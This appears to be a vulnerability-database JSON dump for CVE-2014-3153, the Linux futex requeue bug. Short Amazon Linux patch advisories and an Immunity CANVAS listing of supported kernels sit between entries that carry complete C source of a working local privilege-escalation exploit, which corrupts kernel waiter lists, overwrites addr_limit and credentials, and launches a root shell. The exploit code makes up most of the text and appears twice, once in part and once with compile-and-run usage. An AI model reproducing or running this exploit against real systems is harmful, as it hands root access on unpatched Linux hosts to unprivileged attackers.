long)waiter_plist;\r\n\t}\r\n\t\r\n\tfor (i = 0; i < ARRAY_SIZE(msg_iov); i++) {\r\n\tmsg_iov[i].iov_base = waiter_plist;\r\n\tmsg_iov[i].iov_len = (long)waiter_plist;\r\n\t}\r\n\tmsg_iov[1].iov_base = (void *)iov_base0;\r\n\t\r\n\tmsgvec[0].msg_hdr.msg_name = databuf;\r\n\tmsgvec[0].msg_hdr.msg_namelen = sizeof databuf;\r\n\tmsgvec[0].msg_hdr.msg_iov = msg_iov;\r\n\tmsgvec[0].msg_hdr.msg_iovlen = ARRAY_SIZE(msg_iov);\r\n\tmsgvec[0].msg_hdr.msg_control = databuf;\r\n\tmsgvec[0].msg_hdr.msg_controllen = ARRAY_SIZE(databuf);\r\n\tmsgvec[0].msg_hdr.msg_flags = 0;\r\n\tmsgvec[0].msg_len = 0;\r\n\t\r\n\tsyscall(__NR_futex, &swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &swag2, 0);\r\n\t\r\n\tsync_with_parent(&do_socket_tid_read, &did_socket_tid_read);\r\n\t\r\n\tret = 0;\r\n\t\r\n\twhile (1) {\r\n\tret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0);\r\n\tif (ret <= 0) {\r\n\t\tbreak;\r\n\t} else \r\n\t\tprintf(\"sendmmsg ret %d\\n\", ret);\r\n\t}\r\n\treturn NULL;\r\n}\r\n\r\nstatic void plist_set_next(struct list_head *node, struct list_head *head)\r\n{\r\n\tnode->next = head;\r\n\thead->prev = node;\r\n\tnode->prev = head;\r\n\thead->next = node;\r\n}\r\n\r\nstatic void setup_waiter_params(struct rt_mutex_waiter *rt_waiters)\r\n{\r\n\trt_waiters[0].list_entry.prio = USER_PRIO_BASE + 9;\r\n\trt_waiters[1].list_entry.prio = USER_PRIO_BASE + 13;\r\n\tplist_set_next(&rt_waiters[0].list_entry.prio_list, &rt_waiters[1].list_entry.prio_list);\r\n\tplist_set_next(&rt_waiters[0].list_entry.node_list, &rt_waiters[1].list_entry.node_list);\r\n}\r\n\r\nstatic bool do_exploit(void *waiter_plist)\r\n{\r\n\tvoid *magicval, *magicval2;\r\n\tstruct rt_mutex_waiter *rt_waiters;\r\n\tpid_t pid;\r\n\tpid_t pid6, pid7, pid12, pid11;\r\n\t\r\n\trt_waiters = PRIO_LIST_TO_WAITER(waiter_plist);\r\n\t\r\n\tsyscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\r\n\t\r\n\twhile (syscall(__NR_futex, &swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag) != 1) {\r\n\t\tusleep(10);\r\n\t}\r\n\t\r\n\tpthread_t th6 = create_thread_do_futex_lock_pi_with_priority(6);\r\n\tpthread_t th7 = create_thread_do_futex_lock_pi_with_priority(7);\r\n\t\r\n\tswag2 = 0;\r\n\tdo_socket_tid_read = 0;\r\n\tdid_socket_tid_read = 0;\r\n\t\r\n\tsyscall(__NR_futex, &swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag2);\r\n\t\r\n\tif (sync_with_child_getchar(waiter_thread_tid, &do_socket_tid_read, &did_socket_tid_read) < 0) {\r\n\treturn false;\r\n\t}\r\n\t\r\n\tsetup_waiter_params(rt_waiters);\r\n\tmagicval = rt_waiters[0].list_entry.prio_list.next;\r\n\tprintf(\"Checking whether exploitable..\");\r\n\tpthread_t th11 = create_thread_do_futex_lock_pi_with_priority(11);\r\n\t\r\n\tif (rt_waiters[0].list_entry.prio_list.next == magicval) {\r\n\t\tprintf(\"failed\\n\");\r\n\t\treturn false;\r\n\t}\r\n\tprintf(\"OK\\nSeaching good magic...\\n\");\r\n\tmagicval = rt_waiters[0].list_entry.prio_list.next;\r\n\t\r\n\tpthread_cancel_immediately(th11);\r\n\t\r\n\tpthread_t th11_1, th11_2;\r\n\twhile(1) {\r\n\t\tsetup_waiter_params(rt_waiters);\r\n\t\tth11_1 = create_thread_do_futex_lock_pi_with_priority(11);\r\n\t\tmagicval = rt_waiters[0].list_entry.prio_list.next;\r\n\t\thack_thread_stack = (struct thread_info *)((unsigned long)magicval & 0xffffffffffffe000);\r\n\t\trt_waiters[1].list_entry.node_list.prev = (void *)&hack_thread_stack->addr_limit;\r\n\t\t\r\n\t\tth11_2 = create_thread_do_futex_lock_pi_with_priority(11);\r\n\t\tmagicval2 = rt_waiters[1].list_entry.node_list.prev;\r\n\t\t\r\n\t\tprintf(\"magic1=%p magic2=%p\\n\", magicval, magicval2);\r\n\t\tif(magicval < magicval2) {\r\n\t\t\tprintf(\"Good magic found\\nHacking...\\n\");\r\n\t\t\tbreak;\r\n\t\t} else {\r\n\t\t\tpthread_cancel_immediately(th11_1);\r\n\t\t\tpthread_cancel_immediately(th11_2);\r\n\t\t}\t\t\r\n\t}\r\n\tpwaiter11 = NODE_LIST_TO_WAITER(magicval2);\r\n\tpthread_mutex_lock(&hacked_lock);\r\n\tpthread_kill(th11_1, SIGNAL_HACK_KERNEL);\r\n\tpthread_cond_wait(&hacked, &hacked_lock);\r\n\tpthread_mutex_unlock(&hacked_lock);\r\n\tclose(listenfd);\r\n\t\r\n\tstruct rt_mutex_waiter waiter11;\r\n\tstruct rt_mutex *pmutex;\r\n\tint len = read_pipe(pwaiter11, &waiter11, sizeof(waiter11));\r\n\tif(len != sizeof(waiter11)) {\r\n\t\tpmutex = NULL;\r\n\t} else {\r\n\t\tpmutex = waiter11.lock;\r\n\t}\r\n\tfix_rt_mutex_waiter_list(pmutex);\r\n\t\r\n\tpthread_cancel_immediately(th11_1);\r\n\tpthread_cancel_immediately(th11_2);\r\n\t\r\n\tpthread_cancel_immediately(th7);\r\n\tpthread_cancel_immediately(th6);\r\n\tclose(clientfd);\r\n\tpthread_cancel_immediately(thread_client_to_setup_rt_waiter);\r\n\t\r\n\texit(0);\r\n}\r\n\r\n#define MMAP_ADDR_BASE\t0x0c000000\r\n#define MMAP_LEN\t\t0x0c001000\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tunsigned long mapped_address;\r\n\tvoid *waiter_plist;\r\n\t\r\n\tprintf(\"CVE-2014-3153 exploit by Chen Kaiqu(kaiquchen@163.com)\\n\");\r\n \r\n\tmain_pid = gettid();\r\n\tif(fork() == 0) {\r\n\t\tiov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\r\n\t\tif (iov_base0 < 0xb0000000) {\r\n\t\t\tprintf(\"mmap failed?\\n\");\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t\tiov_len0 = 0x10000;\r\n\t\t\r\n\t\tiov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\r\n\t\tif (iov_basex < MMAP_ADDR_BASE) {\r\n\t\t\tprintf(\"mmap failed?\\n\");\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t\tiov_lenx = MMAP_LEN;\r\n\t\t\r\n\t\twaiter_plist = (void *)iov_basex + 0x400;\r\n\t\tpthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist);\r\n\t\t\r\n\t\tsockfd = server_for_setup_rt_waiter();\r\n\t\tif (sockfd < 0) {\r\n\t\t\tprintf(\"Server failed\\n\");\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t\t\r\n\t\tif (!do_exploit(waiter_plist)) {\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t\treturn 0;\r\n\t}\r\n\r\n\twhile(getuid())\r\n\t\tusleep(100);\r\n\texecl(\"/bin/bash\", \"bin/bash\", NULL);\r\n\treturn 0;\r\n}\r\n\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35370/"}], "amazon": [{"lastseen": "2020-11-10T12:35:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "**Issue Overview:**\n\nThe futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-debuginfo-common-i686-3.10.42-52.145.amzn1.i686 \n kernel-3.10.42-52.145.amzn1.i686 \n perf-debuginfo-3.10.42-52.145.amzn1.i686 \n kernel-devel-3.10.42-52.145.amzn1.i686 \n kernel-debuginfo-3.10.42-52.145.amzn1.i686 \n kernel-headers-3.10.42-52.145.amzn1.i686 \n perf-3.10.42-52.145.amzn1.i686 \n \n noarch: \n kernel-doc-3.10.42-52.145.amzn1.noarch \n \n src: \n kernel-3.10.42-52.145.amzn1.src \n \n x86_64: \n kernel-3.10.42-52.145.amzn1.x86_64 \n perf-3.10.42-52.145.amzn1.x86_64 \n perf-debuginfo-3.10.42-52.145.amzn1.x86_64 \n kernel-headers-3.10.42-52.145.amzn1.x86_64 \n kernel-devel-3.10.42-52.145.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.10.42-52.145.amzn1.x86_64 \n kernel-debuginfo-3.10.42-52.145.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-06-15T16:30:00", "published": "2014-06-15T16:30:00", "id": "ALAS-2014-363", "href": "https://alas.aws.amazon.com/ALAS-2014-363.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:35:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1739", "CVE-2014-0196", "CVE-2014-3153"], "description": "**Issue Overview:**\n\nThe media_device_enum_entities function in drivers/media/media-device.c in the Linux kernel before 3.14.6 does not initialize a certain data structure, which allows local users to obtain sensitive information from kernel memory by leveraging /dev/media0 read access for a MEDIA_IOC_ENUM_ENTITIES ioctl call. \n\nA flaw was found in the way the Linux kernel's futex subsystem handled the requeuing of certain Priority Inheritance (PI) futexes. A local, unprivileged user could use this flaw to escalate their privileges on the system. \n\nThe n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the \"LECHO & !OPOST\" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings. \n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-debuginfo-3.10.53-56.140.amzn1.i686 \n kernel-headers-3.10.53-56.140.amzn1.i686 \n perf-3.10.53-56.140.amzn1.i686 \n kernel-3.10.53-56.140.amzn1.i686 \n kernel-debuginfo-3.10.53-56.140.amzn1.i686 \n kernel-debuginfo-common-i686-3.10.53-56.140.amzn1.i686 \n kernel-devel-3.10.53-56.140.amzn1.i686 \n \n noarch: \n kernel-doc-3.10.53-56.140.amzn1.noarch \n \n src: \n kernel-3.10.53-56.140.amzn1.src \n \n x86_64: \n kernel-headers-3.10.53-56.140.amzn1.x86_64 \n kernel-3.10.53-56.140.amzn1.x86_64 \n kernel-debuginfo-3.10.53-56.140.amzn1.x86_64 \n kernel-devel-3.10.53-56.140.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.10.53-56.140.amzn1.x86_64 \n perf-3.10.53-56.140.amzn1.x86_64 \n perf-debuginfo-3.10.53-56.140.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-08-21T11:03:00", "published": "2014-08-21T11:03:00", "id": "ALAS-2014-392", "href": "https://alas.aws.amazon.com/ALAS-2014-392.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T19:48:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "edition": 2, "description": "**Name**| linux_futex_requeue \n---|--- \n**CVE**| CVE-2014-3153 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Futex Requeue Privilege Escalation Exploit \n**Notes**| Repeatability: Multiple times \nNotes: \n\\- Supported 64bit kernels: \n3.11.0-[13-22]-generic - Ubuntu saucy 13.10 \n3.11.0-[13-22]-generic - Ubuntu precise 12.04 \n3.13.0-[24-27]-generic - Ubuntu trusty 14.04 \n3.13.0-[24-27]-generic - Ubuntu precise 12.04 \n3.2.0-[23-63]-generic - Ubuntu precise 12.04 \n3.5.0-[19-49]-generic - Ubuntu precise 12.04 \n3.8.0-[19-41]-generic - Ubuntu precise 12.04 \n \n\\- Supported 32bit kernels: \n3.11.0-[13-22]-generic - Ubuntu saucy 13.10 \n3.11.0-[13-22]-generic - Ubuntu precise 12.04 \n3.13.0-[24-27]-generic - Ubuntu trusty 14.04 \n3.13.0-[24-27]-generic - Ubuntu precise 12.04 \n3.2.0-23-generic - Ubuntu precose 12.04 \n3.2.0-[33-63]-generic - Ubuntu precise 12.04 \n3.2.0-23-generic-pae - Ubuntu precise pae 12.04 \n3.2.0-[33-63]-generic-pae - Ubuntu precise pae 12.04 \n3.5.0-[19-49]-generic - Ubuntu precise 12.04 \n3.5.0-[19-49]-generic - Ubuntu quantal 12.10 \n3.8.0-[19-41]-generic - Ubuntu precise 12.04 \n3.8.0-[19-41]-generic - Ubuntu raring 13.04 \n2.6.32-220.*el6.i686 - Centos/RH6 \n2.6.32-279.*el6.i686 - Centos/RH6 \n2.6.32-358.*el6.i686 - Centos/RH6 \n2.6.32-431.*el6.i686 - Centos/RH6 \n \n \nVENDOR: Linux \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153 \nCVE Name: CVE-2014-3153 \n\n", "modified": "2014-06-07T14:55:00", "published": "2014-06-07T14:55:00", "id": "LINUX_FUTEX_REQUEUE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/linux_futex_requeue", "type": "canvas", "title": "Immunity Canvas: LINUX_FUTEX_REQUEUE", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.14.5 (CentOS 7 RHEL) - libfutex Local Privilege Escalation", "edition": 1, "published": "2014-11-25T00:00:00", "title": "Linux Kernel 3.14.5 (CentOS 7 RHEL) - libfutex Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2014-11-25T00:00:00", "id": "EXPLOITPACK:6D7A39DDD9FCE730C1AA0BD07808752A", "href": "", "sourceData": "/*\n * CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406\n * By Kaiqu Chen ( kaiquchen@163.com )\n * Based on libfutex and the expoilt for Android by GeoHot.\n *\n * Usage:\n * $gcc exploit.c -o exploit -lpthread\n * $./exploit\n *\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <stdbool.h>\n#include <pthread.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <string.h>\n#include <errno.h>\n#include <linux/futex.h>\n#include <sys/socket.h>\n#include <sys/mman.h>\n#include <sys/syscall.h>\n#include <sys/resource.h>\n#include <arpa/inet.h>\n#include <netinet/in.h> \n#include <netinet/tcp.h> \n\n#define ARRAY_SIZE(a)\t(sizeof (a) / sizeof (*(a)))\n\n#define FUTEX_WAIT_REQUEUE_PI 11\n#define FUTEX_CMP_REQUEUE_PI 12\n#define USER_PRIO_BASE 120\n#define LOCAL_PORT 5551\n\n#define SIGNAL_HACK_KERNEL 12\n#define SIGNAL_THREAD_EXIT 10\n\n#define OFFSET_PID\t\t\t0x4A4 \n#define OFFSET_REAL_PARENT\t0x4B8\n#define OFFSET_CRED\t\t\t0x668\n\n#define SIZEOF_CRED\t\t\t160\n#define SIZEOF_TASK_STRUCT\t2912\n#define OFFSET_ADDR_LIMIT\t0x20\n\n#define PRIO_LIST_OFFSET\t8\t\n#define NODE_LIST_OFFSET\t(PRIO_LIST_OFFSET + sizeof(struct list_head))\n#define PRIO_LIST_TO_WAITER(list) (((void *)(list)) - PRIO_LIST_OFFSET)\n#define WAITER_TO_PRIO_LIST(waiter) (((void *)(waiter)) + PRIO_LIST_OFFSET)\n#define NODE_LIST_TO_WAITER(list) (((void *)(list)) - NODE_LIST_OFFSET)\n#define WAITER_TO_NODE_LIST(waiter) (((void *)(waiter)) + NODE_LIST_OFFSET)\n#define MUTEX_TO_PRIO_LIST(mutex) (((void *)(mutex)) + sizeof(long))\n#define MUTEX_TO_NODE_LIST(mutex) (((void *)(mutex)) + sizeof(long) + sizeof(struct list_head))\n\n////////////////////////////////////////////////////////////////////\nstruct task_struct;\n\nstruct thread_info {\n struct task_struct *task;\n void *exec_domain;\n int flags;\n int status;\n int cpu;\n int preempt_count;\n void *addr_limit;\n};\n\nstruct list_head {\n struct list_head *next;\n struct list_head *prev;\n};\n\nstruct plist_head {\n\tstruct list_head node_list;\n};\n\nstruct plist_node {\n int prio;\n struct list_head prio_list;\n struct list_head node_list;\n};\n\nstruct rt_mutex {\n\tunsigned long\t\twait_lock;\n\tstruct plist_head\twait_list;\n\tstruct task_struct\t*owner;\n};\n\nstruct rt_mutex_waiter {\n struct plist_node list_entry;\n struct plist_node pi_list_entry;\n struct task_struct *task;\n struct rt_mutex *lock;\n};\n\nstruct mmsghdr {\n struct msghdr msg_hdr;\n unsigned int msg_len;\n};\n\nstruct cred {\n\tint\tusage;\n\tint\tuid;\t\t/* real UID of the task */\n\tint\tgid;\t\t/* real GID of the task */\n\tint\tsuid;\t\t/* saved UID of the task */\n\tint\tsgid;\t\t/* saved GID of the task */\n\tint\teuid;\t\t/* effective UID of the task */\n\tint\tegid;\t\t/* effective GID of the task */\n\tint\tfsuid;\t\t/* UID for VFS ops */\n\tint\tfsgid;\t\t/* GID for VFS ops */\n};\n\n////////////////////////////////////////////////////////////////////\n\nstatic int swag = 0;\nstatic int swag2 = 0;\nstatic int main_pid;\n\nstatic pid_t waiter_thread_tid;\n\nstatic pthread_mutex_t hacked_lock;\nstatic pthread_cond_t hacked;\n\nstatic pthread_mutex_t done_lock;\nstatic pthread_cond_t done;\n\nstatic pthread_mutex_t is_thread_desched_lock;\nstatic pthread_cond_t is_thread_desched;\n\nstatic volatile int do_socket_tid_read = 0;\nstatic volatile int did_socket_tid_read = 0;\n\nstatic volatile int do_dm_tid_read = 0;\nstatic volatile int did_dm_tid_read = 0;\n\nstatic pid_t last_tid = 0;\n\nstatic volatile int_sync_time_out = 0;\n\nstruct thread_info thinfo;\nchar task_struct_buf[SIZEOF_TASK_STRUCT];\nstruct cred cred_buf;\n\nstruct thread_info *hack_thread_stack = NULL;\n\npthread_t thread_client_to_setup_rt_waiter;\n\nint listenfd;\nint sockfd;\nint clientfd;\n\n////////////////////////////////////////////////////////////////\nint gettid()\n{\n\treturn syscall(__NR_gettid);\n}\n\nssize_t read_pipe(void *kbuf, void *ubuf, size_t count) {\n\tint pipefd[2];\n\tssize_t len;\n\n\tpipe(pipefd);\n\n\tlen = write(pipefd[1], kbuf, count);\n\n\tif (len != count) {\n\t\tprintf(\"Thread %d failed in reading @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\n\t\twhile(1) { sleep(10); }\n\t}\n\n\tread(pipefd[0], ubuf, count);\n\n\tclose(pipefd[0]);\n\tclose(pipefd[1]);\n\n\treturn len;\n}\n\nssize_t write_pipe(void *kbuf, void *ubuf, size_t count) {\n\tint pipefd[2];\n\tssize_t len;\n\n\tpipe(pipefd);\n\n\twrite(pipefd[1], ubuf, count);\n\tlen = read(pipefd[0], kbuf, count);\n\n\tif (len != count) {\n\t\tprintf(\"Thread %d failed in writing @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\n\t\twhile(1) { sleep(10); }\n\t}\n\n\tclose(pipefd[0]);\n\tclose(pipefd[1]);\n\n\treturn len;\n}\n\nint pthread_cancel_immediately(pthread_t thid)\n{\n\tpthread_kill(thid, SIGNAL_THREAD_EXIT);\n\tpthread_join(thid, NULL);\n\treturn 0;\n}\n\nvoid set_addr_limit(void *sp)\n{\n\tlong newlimit = -1;\n\twrite_pipe(sp + OFFSET_ADDR_LIMIT, (void *)&newlimit, sizeof(long));\n}\n\nvoid set_cred(struct cred *kcred)\n{\n\tstruct cred cred_buf;\n\tint len;\n\n\tlen = read_pipe(kcred, &cred_buf, sizeof(cred_buf));\n\tcred_buf.uid = cred_buf.euid = cred_buf.suid = cred_buf.fsuid = 0;\n\tcred_buf.gid = cred_buf.egid = cred_buf.sgid = cred_buf.fsgid = 0;\n\tlen = write_pipe(kcred, &cred_buf, sizeof(cred_buf));\n}\n\nstruct rt_mutex_waiter *pwaiter11;\n\nvoid set_parent_cred(void *sp, int parent_tid)\n{\n\tint len;\n\tint tid;\n\tstruct task_struct *pparent;\n\tstruct cred *pcred;\n\t\n\tset_addr_limit(sp);\n\t\n\tlen = read_pipe(sp, &thinfo, sizeof(thinfo));\n\tif(len != sizeof(thinfo)) {\n\t\tprintf(\"Read %p error %d\\n\", sp, len);\n\t}\n\t\n\tvoid *ptask = thinfo.task;\n\tlen = read_pipe(ptask, task_struct_buf, SIZEOF_TASK_STRUCT);\n\ttid = *(int *)(task_struct_buf + OFFSET_PID);\n\n\twhile(tid != 0 && tid != parent_tid) {\n\t\tpparent = *(struct task_struct **)(task_struct_buf + OFFSET_REAL_PARENT);\n\t\tlen = read_pipe(pparent, task_struct_buf, SIZEOF_TASK_STRUCT);\n\t\ttid = *(int *)(task_struct_buf + OFFSET_PID);\n\t}\n\n\tif(tid == parent_tid) {\n\t\tpcred = *(struct cred **)(task_struct_buf + OFFSET_CRED);\n\t\tset_cred(pcred);\n\t} else\n\t\tprintf(\"Pid %d not found\\n\", parent_tid);\n\treturn;\n}\n\nstatic int read_voluntary_ctxt_switches(pid_t pid)\n{\n\tchar filename[256];\n\tFILE *fp;\n\tint vcscnt = -1;\n\n\tsprintf(filename, \"/proc/self/task/%d/status\", pid);\n\tfp = fopen(filename, \"rb\");\n\tif (fp) {\n\t\tchar filebuf[4096];\n\t\tchar *pdest;\n\t\tfread(filebuf, 1, sizeof filebuf, fp);\n\t\tpdest = strstr(filebuf, \"voluntary_ctxt_switches\");\n\t\tvcscnt = atoi(pdest + 0x19);\n\t\tfclose(fp);\n\t}\n\treturn vcscnt;\n}\n\nstatic void sync_timeout_task(int sig)\n{\n\tint_sync_time_out = 1;\n}\n\nstatic int sync_with_child_getchar(pid_t pid, int volatile *do_request, int volatile *did_request)\n{\n\twhile (*do_request == 0) { }\n\tprintf(\"Press RETURN after one second...\");\n\t*did_request = 1;\n\tgetchar();\n\treturn 0;\n}\n\nstatic int sync_with_child(pid_t pid, int volatile *do_request, int volatile *did_request)\n{\n\tstruct sigaction act;\n\tint vcscnt;\n\tint_sync_time_out = 0;\n\n\tact.sa_handler = sync_timeout_task;\n\tsigemptyset(&act.sa_mask);\n\tact.sa_flags = 0;\n\tact.sa_restorer = NULL;\n\tsigaction(SIGALRM, &act, NULL);\n\n\talarm(3);\n\twhile (*do_request == 0) {\n\t\tif (int_sync_time_out)\n\t\t\treturn -1;\n\t}\n\t\n\talarm(0);\n\tvcscnt = read_voluntary_ctxt_switches(pid);\n\t*did_request = 1;\n\twhile (read_voluntary_ctxt_switches(pid) != vcscnt + 1) {\n \tusleep(10);\n\t}\n\n\treturn 0;\n}\n\nstatic void sync_with_parent(int volatile *do_request, int volatile *did_request)\n{\n\t*do_request = 1;\n\twhile (*did_request == 0) { }\n}\n\nvoid fix_rt_mutex_waiter_list(struct rt_mutex *pmutex)\n{\n\tstruct rt_mutex_waiter *pwaiter6, *pwaiter7;\n\tstruct rt_mutex_waiter waiter6, waiter7;\n\tstruct rt_mutex mutex;\n\tif(!pmutex) \n\t\treturn;\n\tread_pipe(pmutex, &mutex, sizeof(mutex));\n\tpwaiter6 = NODE_LIST_TO_WAITER(mutex.wait_list.node_list.next);\n\tif(!pwaiter6) \n\t\treturn;\n\tread_pipe(pwaiter6, &waiter6, sizeof(waiter6));\n\tpwaiter7 = NODE_LIST_TO_WAITER(waiter6.list_entry.node_list.next);\n\tif(!pwaiter7) \n\t\treturn;\n\tread_pipe(pwaiter7, &waiter7, sizeof(waiter7));\n\t\n\twaiter6.list_entry.prio_list.prev = waiter6.list_entry.prio_list.next;\n\twaiter7.list_entry.prio_list.next = waiter7.list_entry.prio_list.prev;\n\tmutex.wait_list.node_list.prev = waiter6.list_entry.node_list.next;\n\twaiter7.list_entry.node_list.next = waiter6.list_entry.node_list.prev;\n\t\n\twrite_pipe(pmutex, &mutex, sizeof(mutex));\n\twrite_pipe(pwaiter6, &waiter6, sizeof(waiter6));\n\twrite_pipe(pwaiter7, &waiter7, sizeof(waiter7));\n}\n\nstatic void void_handler(int signum)\n{\n\tpthread_exit(0);\n}\n\nstatic void kernel_hack_task(int signum)\n{\n\tstruct rt_mutex *prt_mutex, rt_mutex;\n\tstruct rt_mutex_waiter rt_waiter11;\n\tint tid = syscall(__NR_gettid);\n\tint pid = getpid();\n\n\tset_parent_cred(hack_thread_stack, main_pid);\n\t\n\tread_pipe(pwaiter11, (void *)&rt_waiter11, sizeof(rt_waiter11));\n\t\n\tprt_mutex = rt_waiter11.lock;\n\tread_pipe(prt_mutex, (void *)&rt_mutex, sizeof(rt_mutex));\n\t\n\tvoid *ptask_struct = rt_mutex.owner;\n\tptask_struct = (void *)((long)ptask_struct & ~ 0xF);\n\tint len = read_pipe(ptask_struct, task_struct_buf, SIZEOF_TASK_STRUCT);\n\tint *ppid = (int *)(task_struct_buf + OFFSET_PID);\n\tvoid **pstack = (void **)&task_struct_buf[8];\n\tvoid *owner_sp = *pstack;\n\tset_addr_limit(owner_sp);\n\n\tpthread_mutex_lock(&hacked_lock);\n\tpthread_cond_signal(&hacked);\n\tpthread_mutex_unlock(&hacked_lock);\n}\n\nstatic void *call_futex_lock_pi_with_priority(void *arg)\n{\n\tint prio;\n\tstruct sigaction act;\n\tint ret;\n\t\n\tprio = (long)arg;\n\tlast_tid = syscall(__NR_gettid);\n\t\n\tpthread_mutex_lock(&is_thread_desched_lock);\n\tpthread_cond_signal(&is_thread_desched);\n\t\n\tact.sa_handler = void_handler;\n\tsigemptyset(&act.sa_mask);\n\tact.sa_flags = 0;\n\tact.sa_restorer = NULL;\n\tsigaction(SIGNAL_THREAD_EXIT, &act, NULL);\n\t\n\tact.sa_handler = kernel_hack_task;\n\tsigemptyset(&act.sa_mask);\n\tact.sa_flags = 0;\n\tact.sa_restorer = NULL;\n\tsigaction(SIGNAL_HACK_KERNEL, &act, NULL);\n\t\n\tsetpriority(PRIO_PROCESS, 0, prio);\n\t\n\tpthread_mutex_unlock(&is_thread_desched_lock);\n\t\n\tsync_with_parent(&do_dm_tid_read, &did_dm_tid_read);\n\t\n\tret = syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\n\t\n\treturn NULL;\n}\n\nstatic pthread_t create_thread_do_futex_lock_pi_with_priority(int prio)\n{\n\tpthread_t th4;\n\tpid_t pid;\n\t\n\tdo_dm_tid_read = 0;\n\tdid_dm_tid_read = 0;\n\t\n\tpthread_mutex_lock(&is_thread_desched_lock);\n\tpthread_create(&th4, 0, call_futex_lock_pi_with_priority, (void *)(long)prio);\n\tpthread_cond_wait(&is_thread_desched, &is_thread_desched_lock);\n\t\n\tpid = last_tid;\n\t\n\tsync_with_child(pid, &do_dm_tid_read, &did_dm_tid_read);\n\t\n\tpthread_mutex_unlock(&is_thread_desched_lock);\n\t\n\treturn th4;\n}\n\nstatic int server_for_setup_rt_waiter(void)\n{\n\tint sockfd;\n\tint yes = 1;\n\tstruct sockaddr_in addr = {0};\n\t\n\tsockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\n\t\n\tsetsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes));\n\t\n\taddr.sin_family = AF_INET;\n\taddr.sin_port = htons(LOCAL_PORT);\n\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n\tbind(sockfd, (struct sockaddr *)&addr, sizeof(addr));\n\t\n\tlisten(sockfd, 1);\n\tlistenfd = sockfd;\n\t\n\treturn accept(sockfd, NULL, NULL);\n}\n\nstatic int connect_server_socket(void)\n{\n\tint sockfd;\n\tstruct sockaddr_in addr = {0};\n\tint ret;\n\tint sock_buf_size;\n\t\n\tsockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\n\tif (sockfd < 0) {\n\t\tprintf(\"socket failed\\n\");\n\t\tusleep(10);\n\t} else {\n\t\taddr.sin_family = AF_INET;\n\t\taddr.sin_port = htons(LOCAL_PORT);\n\t\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n\t}\n\t\n\twhile (connect(sockfd, (struct sockaddr *)&addr, 16) < 0) {\n\t\tusleep(10);\n\t}\n\t\n\tsock_buf_size = 1;\n\tsetsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size));\n\t\n\treturn sockfd;\n}\n\nunsigned long iov_base0, iov_basex;\nsize_t iov_len0, iov_lenx;\n\nstatic void *client_to_setup_rt_waiter(void *waiter_plist)\n{\n\tint sockfd;\n\tstruct mmsghdr 